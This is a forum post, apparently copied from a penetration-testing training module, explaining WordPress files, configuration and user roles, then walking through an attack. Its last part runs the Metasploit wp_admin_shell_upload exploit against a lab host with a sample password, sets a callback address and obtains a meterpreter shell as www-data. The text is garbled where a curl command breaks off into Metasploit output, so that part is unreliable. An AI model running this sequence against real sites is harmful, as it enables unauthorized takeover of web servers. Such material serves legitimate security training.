November 11, 2022 at 9:33 AM
[hide] Basic Wordpress and Wordpress StructurefireWordpress Structure fireWordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.Below is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.tree -L 1 /var/www/html├── index.php├── license.txt├── readme.html├── wp-activate.php├── wp-admin├── wp-blog-header.php├── wp-comments-post.php├── wp-config.php├── wp-config-sample.php├── wp-content├── wp-cron.php├── wp-includes├── wp-links-opml.php├── wp-load.php├── wp-login.php├── wp-mail.php├── wp-settings.php├── wp-signup.php├── wp-trackback.php└── xmlrpc.phpalien Key WordPress Files female_signThe root directory of WordPress contains files that are needed to configure WordPress to function correctly.index.php is the homepage of WordPress.license.txt contains useful information such as the version WordPress installed.wp-activate.php is used for the email activation process when setting up a new WordPress site.wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions. The login page can be located at one of the following paths:/wp-admin/login.php/wp-admin/wp-login.php/login.php/wp-login.phpThis file can also be renamed to make it more challenging to find the login page.xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.WordPress Configuration FileWordPress Configuration FileThe wp-config.php file contains information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.wp-config.phpCode: php *//** The name of the database for WordPress */define( 'DB_NAME', 'database_name_here' );/** MySQL database username */define( 'DB_USER', 'username_here' );/** MySQL database password */define( 'DB_PASSWORD', 'password_here' );/** MySQL hostname */define( 'DB_HOST', 'localhost' );/** Authentication Unique Keys and Salts */ /* */define( 'AUTH_KEY', 'put your unique phrase here' );define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );define( 'LOGGED_IN_KEY', 'put your unique phrase here' );define( 'NONCE_KEY', 'put your unique phrase here' );define( 'AUTH_SALT', 'put your unique phrase here' );define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );define( 'LOGGED_IN_SALT', 'put your unique phrase here' );define( 'NONCE_SALT', 'put your unique phrase here' );/** WordPress Database Table prefix */$table_prefix = 'wp_';/** For developers: WordPress debugging mode. *//** */define( 'WP_DEBUG', false );/** Absolute path to the WordPress directory. */if ( ! defined( 'ABSPATH' ) ) {define( 'ABSPATH', __DIR__ . '/' );}/** Sets up WordPress vars and included files. */require_once ABSPATH . 'wp-settings.php';Key WordPress DirectoriesThe wp-content folder is the main directory where plugins and themes are stored. The subdirectory uploads/ is usually where any files uploaded to the platform are stored. These directories and files should be carefully enumerated as they may lead to contain sensitive data that could lead to remote code execution or exploitation of other vulnerabilities or misconfigurations.WP-Contenttree -L 1 /var/www/html/wp-content├── index.php├── plugins└── themesWP-Includeswp-includes contains everything except for the administrative components and the themes that belong to the website. This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.tree -L 1 /var/www/html/wp-includes├── theme.php├── update.php├── user.php├── vars.php├── version.php├── widgets├── widgets.php├── wlwmanifest.xml├── wp-db.php└── wp-diff.phpWordPress User RolesThere are five types of users in a standard WordPress installation.Role DescriptionAdministrator This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.Editor An editor can publish and manage posts, including the posts of other users.Author Authors can publish and manage their own posts.Contributor These users can write and manage their own posts but cannot publish them.Subscriber These are normal users who can browse posts and edit their profiles.Gaining access as an administrator is usually needed to obtain code execution on the server. However, editors and authors might have access to certain vulnerable plugins that normal users do not.1st_place_medalEnumeration Procedure For Wordpress Website in ManuallyWordpress Version CheckCheck Wordpress Version using given below curl command or seeing source codecommnad: curl -s -X GET http://blog.inlanefreight.com | grep ' search wp_adminMatching Modules0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell UploadModule Selection:msf5 > use 0msf5 exploit(unix/webapp/wp_admin_shell_upload) >Module Options msf5 exploit(unix/webapp/wp_admin_shell_upload) > optionsModule options (exploit/unix/webapp/wp_admin_shell_upload): PASSWORD yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME yes The WordPress username to authenticate with VHOST no HTTP server virtual hostExploit target: Id Name -- ---- 0 WordPressset and Exploitationmsf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.commsf5 exploit(unix/webapp/wp_admin_shell_upload) > set username adminmsf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8msf5 exploit(unix/webapp/wp_admin_shell_upload) > runmeterpreter > getuid Server username: www—data (33)prayPracticing Sites: https://tryhackme.com/room/allinonemj https://tryhackme.com/room/wordpresscve202129447 https://tryhackme.com/room/blogfireworks Website Security Testing Site: https://sitecheck.sucuri.net/ Install https://github.com/cyberteach360/Hacking-Wordpress [/hide]